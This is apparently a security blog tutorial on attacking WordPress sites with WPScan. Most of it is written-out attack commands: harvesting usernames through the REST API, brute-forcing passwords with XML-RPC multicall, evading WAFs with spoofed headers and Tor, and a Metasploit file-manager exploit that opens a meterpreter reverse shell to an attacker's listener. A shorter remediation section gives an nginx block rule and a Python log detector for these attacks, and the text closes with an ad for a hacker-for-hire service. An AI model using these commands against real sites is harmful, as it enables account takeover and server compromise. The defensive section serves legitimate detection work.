    WP-SCAN-02 | 15 min | mhfh research | 2024-05-13

    Advanced WPScan: Tactical Enumeration and Brute-Force Techniques

    Transitioning to active engagement. Master user harvesting via REST API, bypass rate-limiting with XML-RPC multicall, and chain vulnerabilities into Metasploit.

    $cat snippet_wpscan-enumeration-brute-force-techniques.sh
    wpscan --url target.com --passwords-attack xmlrpc --multicall-max-passwords 50

    0x01. Escalation of Privilege: From Passive to Active

    In our previous briefing, we established a passive reconnaissance foundation. However, when passive telemetry fails to yield an unauthenticated RCE vector, operators must transition to active engagement.

    This phase is characterized by aggressive enumeration, tactical brute-forcing, and the evasion of perimeter defenses like Web Application Firewalls (WAFs).

    In this masterclass, we detail the mechanics of advanced user discovery, weaponize the XML-RPC multicall vulnerability, manipulate HTTP headers to evade Cloudflare, and chain intelligence directly into the Metasploit Framework.


    0x02. Advanced User Enumeration: Harvesting the Roster

    Extracting specific usernames is critical for targeted attacks.

    Vector A: The REST API Leak

    Since WordPress 4.7, the REST API exposes the accounts of published authors (user slugs and display names) to unauthenticated clients, which is why the users endpoint is the first stop for roster harvesting.

    $cat output.bash
    # Harvest users via WPScan
    wpscan --url https://target-site.com --enumerate u --api-token $WPSCAN_API_TOKEN
    
    # Manual verification via curl + jq
    curl -s https://target-site.com/wp-json/wp/v2/users | jq '.[].slug'

    0x03. Weaponizing XML-RPC: The Multicall Brute-Force Attack

    The xmlrpc.php file supports system.multicall, allowing an operator to bundle hundreds of password attempts into a single HTTP request, bypassing standard rate limits.

    Executing the Attack via WPScan

    $cat output.bash
    wpscan --url https://target-site.com \
      -U target_users.txt \
      -P /opt/seclists/Passwords/10k-most-common.txt \
      --passwords-attack xmlrpc \
      --multicall-max-passwords 50 \
      --threads 10

    0x04. Evasion Tactics: Defeating the WAF

    Tactic 1: Signature Obfuscation

    $cat output.bash
    wpscan --url https://target-site.com \
      --random-user-agent \
      --headers "Accept-Language: en-US,en;q=0.9" \
      --headers "Referer: https://google.com/"

    Tactic 2: Rate Limit Circumvention

    $cat output.bash
    wpscan --url https://target-site.com --throttle 3000 --threads 1

    Tactic 3: Proxy Chaining (Tor)

    $cat output.bash
    wpscan --url https://target-site.com --proxy socks5://127.0.0.1:9050 --random-user-agent

    0x05. Aggressive Plugin Discovery

    Inactive or backend-only plugins are prime targets.

    $cat output.bash
    wpscan --url https://target-site.com \
      --enumerate ap \
      --plugins-detection mixed \
      --api-token $WPSCAN_API_TOKEN

    0x06. The Kill Chain: Bridging to Metasploit

    We will now chain a discovered vulnerability (e.g., CVE-2020-25213) into a Metasploit shell.

    Metasploit Configuration

    $cat output.bash
    msfconsole -q
    msf6 > use exploit/multi/http/wp_file_manager_rce
    msf6 > set RHOSTS target-site.com
    msf6 > set PAYLOAD php/meterpreter/reverse_tcp
    msf6 > set LHOST 192.168.1.50
    msf6 > exploit

    Target Compromised.


    0x07. Blue Team Remediation

    1. Neutralize XML-RPC: Block at the server layer (note that this also cuts off legitimate XML-RPC clients such as Jetpack and the WordPress mobile apps, so confirm nothing depends on it first).
    $cat output.nginx
    location = /xmlrpc.php { deny all; access_log off; }
    2. Lock Down REST API: Require authentication for the /wp-json/wp/v2/users endpoint from functions.php, so Vector A returns nothing to anonymous clients.
    3. Fail2Ban Integration: Automatically ban IPs brute-forcing plugin paths and xmlrpc.php.
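    Detection logic for the two vectors covered above, added here as an example and not part of the original article or of WPScan: it scans nginx combined-format access-log lines (constructed below) for anonymous reads of /wp-json/wp/v2/users and for bursts of large POST /xmlrpc.php responses, the same signals a Fail2Ban filter for item 3 would key on. The thresholds, window and sample addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed nginx combined-format lines; addresses and sizes are made up for the example.
SAMPLE_LOG = """\
203.0.113.7 - - [13/May/2024:10:00:01 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.7 - - [13/May/2024:10:00:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.7 - - [13/May/2024:10:00:06 +0000] "POST /xmlrpc.php HTTP/1.1" 200 9118 "-" "curl/8.0"
203.0.113.7 - - [13/May/2024:10:00:07 +0000] "POST /xmlrpc.php HTTP/1.1" 200 9125 "-" "Wget/1.21"
198.51.100.4 - - [13/May/2024:10:00:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Jetpack"
192.0.2.9 - - [13/May/2024:10:00:10 +0000] "GET /blog/hello-world/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+)')
XMLRPC_WINDOW_S = 60        # sliding window for POST /xmlrpc.php from one IP (assumed)
XMLRPC_MAX_POSTS = 3        # POSTs inside the window before alerting (assumed)
MULTICALL_MIN_BYTES = 4096  # a multicall reply carries one fault per bundled attempt (assumed)

def analyse(log_text, window=XMLRPC_WINDOW_S, max_posts=XMLRPC_MAX_POSTS):
    """Return {ip: sorted list of alert names} for the given access-log text."""
    alerts = defaultdict(set)
    xmlrpc_times = defaultdict(list)  # ip -> timestamps of recent POST /xmlrpc.php
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines in another format rather than abort the scan
        ip, method = m['ip'], m['method']
        path = m['path'].split('?', 1)[0]
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        # Vector A: the users endpoint has no business being read by anonymous clients.
        if method == 'GET' and path.startswith('/wp-json/wp/v2/users'):
            alerts[ip].add('rest_user_enum')
        if method == 'POST' and path == '/xmlrpc.php':
            # Failed multicall logins still answer HTTP 200, so key on size and rate, not status.
            if int(m['bytes']) >= MULTICALL_MIN_BYTES:
                alerts[ip].add('xmlrpc_multicall_size')
            times = xmlrpc_times[ip]
            times.append(ts)
            while (ts - times[0]).total_seconds() > window:
                times.pop(0)  # drop hits that fell out of the window
            if len(times) >= max_posts:
                alerts[ip].add('xmlrpc_burst')
    return {ip: sorted(names) for ip, names in alerts.items()}

if __name__ == '__main__':
    for ip, names in analyse(SAMPLE_LOG).items():
        print(ip, ', '.join(names))  # feed these to a ban list or SIEM rule
```

    Because the rule keys on the source address rather than the User-Agent, the --random-user-agent evasion from section 0x04 does not defeat it; a Tor exit or proxy rotation does, which is why the nginx block above remains the primary control.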

    0x08. Strategic Evolution

    In the final masterclass, we will automate these workflows using CI/CD and DevSecOps pipelines.

    WordPress Hacking Article 03: Automating WPScan with CI/CD and DevSecOps Integration


    /// INITIATE SECURE COMMS ///

    Has your infrastructure been compromised? Mobile Hacker For Hire specializes in incident response and the recovery of compromised digital assets.

    Contact Mobile Hacker For Hire for Incident Response and Expert Penetration Testing

    #WordPress #WPScan #Brute-Force #WAF-Bypass #Metasploit